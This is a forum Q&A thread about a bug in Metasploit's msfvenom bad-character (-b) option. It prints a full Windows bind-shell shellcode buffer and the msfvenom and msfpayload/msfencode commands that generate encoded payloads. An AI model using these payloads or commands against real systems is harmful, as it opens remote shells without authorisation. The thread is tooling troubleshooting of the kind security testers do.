3

When using msfvenom, I am under the assumption that the following syntax should give me shellcode without \x00 \x0a \x0d or \x40, because of the -b option

msfvenom -p windows/shell/bind_tcp -b '\x00\x0a\x0d\x40' -f python

However, every shell code I get still has one of these characters in it... e.g.

buf =  ""
buf += "\xbd\xb8\x8c\x23\x17\xd9\xce\xd9\x74\x24\xf4\x5a\x2b"
buf += "\xc9\xb1\x4a\x83\xc2\x04\x31\x6a\x11\x03\x6a\x11\xe2"
buf += "\x4d\x70\xcb\x91\xad\x89\x0c\xfe\x24\x6c\x3d\x2c\x52"
buf += "\xe4\x6c\xe0\x11\xa8\x9c\x8b\x77\x59\x16\xf9\x5f\x6e"
buf += "\x9f\xb4\xb9\x41\x20\x79\x05\x0d\xe2\x1b\xf9\x4c\x37"
buf += "\xfc\xc0\x9e\x4a\xfd\x05\xc2\xa5\xaf\xde\x88\x14\x40"
buf += "\x6b\xcc\xa4\xeb\x27\xc1\xac\x08\xfd\xe0\x9d\x9e\x8a"
buf += "\xba\x3d\x20\x5f\xb7\x77\x3a\xbc\xf4\xce\xb1\x76\x8e"
buf += "\xd0\x13\x47\x6f\xe3\x5b\x0b\x4e\xcb\x51\x52\x96\xec"
buf += "\x89\x21\xec\x0e\x37\x31\x37\x6c\xe3\xb4\xaa\xd6\x60"
buf += "\x6e\x0f\xe6\xa5\xe8\xc4\xe4\x02\x7f\x82\xe8\x95\xac"
buf += "\xb8\x15\x1d\x53\x6f\x9c\x65\x77\xab\xc4\x3e\x16\xea"
buf += "\xa0\x91\x27\xec**\x0d**\x4d\x8d\x66\xbf\x9a\xb8\x24\xa8"
buf += "\x6f\x88\xd6\x28\xf8\x9b\xa5\x1a\xa7\x37\x22\x17\x20"
buf += "\x91\xb5\x58\x1b\x65\x29\xa7\xa4\x95\x63\x6c\xf0\xc5"
buf += "\x1b\x45\x79\x8e\xdb\x6a\xac**\x00**\x8c\xc4\x1f\xe0\x7c"
buf += "\xa5\xcf\x88\x96\x2a\x2f\xa8\x98\xe0\x58\x19\xbc\x58"
buf += "\x0f\x5b\x42\x4e\x93\xd2\xa4\x1a\x3b\xb2\x7f\xb3\xf9"
buf += "\xe1\xb7\x24\x01\xc0\xeb\xfd\x95\x5d\xe2\x3a\x99\x5e"
buf += "\x20\x69\x36\xf7\xa3\xfa\x54\xcc\xd2\xfc\x70\x65\x82"
buf += "\x6b\x0e\xe7\xe1**\x0a**\x0f\x22\x93\xcc\x85\xc8\x32\x9a"
buf += "\x31\xd2\x63\xec\x9d\x2d\x46\x66\x17\xbb\x29\x11\x58"
buf += "\x2b\xaa\xe1\x0e\x21\xaa\x89\xf6\x11\xf9\xac\xf8\x8c"
buf += "\x6d\x7d\x6d\x2e\xc4\xd1\x26\x46\xea\x0c\x00\xc9\x15"
buf += "\x7b\x90\x36\xc0\x42\x16\x4e\x66\xa7\xda"

Am I misunderstanding the -b option?

Jordan Hanna
  • 378
  • 2
  • 5

1 Answers1

3

Seems like msfvenom is having a problem. I can reproduce it at my end. Will report this to the concerned people. In the mean while, you can use the combination of msfpayload and msfencode tools:

./msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/shikata_ga_nai -c 3 -b '\x00\x0a\x0d\x40' t python

Update: The problem was resolved in the commit here. Please don't use msfpayload and msfencode as these are going to be deprecate shortly.

void_in
  • 5,541
  • 1
  • 20
  • 28